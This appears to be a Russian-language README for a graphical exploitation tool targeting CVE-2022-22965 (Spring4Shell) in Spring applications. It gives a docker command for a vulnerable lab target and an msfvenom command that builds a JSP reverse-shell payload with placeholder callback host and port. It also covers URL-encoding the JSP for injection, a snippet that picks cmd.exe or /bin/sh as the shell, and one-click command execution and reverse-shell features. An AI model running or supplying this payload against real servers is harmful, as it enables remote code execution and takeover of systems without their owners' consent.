
Графический инструмент обнаружения для CVE-2022-22965 (Spring4Shell) с генерацией обратной оболочки в один клик, выполнением команд и адаптацией пути оболочки для нескольких серверов.
Целевая машина
docker run -itd -p 80:8080 vulfocus/spring-core-rce-2022-03-29:latest
Reverse shell по сути на основе msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.jsp
После URL-кодирования JSP, используйте %3C%25 заменяет %25%7Bc2%7Di представляет <% %25%3E заменяет %25%7Bsuffix%7Di представляет %> В коде выполнена проверка модификации shellpath для разных типов серверов
if self.radioButton_win.isChecked():
shellpath = "cmd.exe"
if self.radioButton_linux.isChecked():
shellpath = "/bin/sh"
Выполнение команды:
Обнаружение whoami:
Reverse shell в один клик
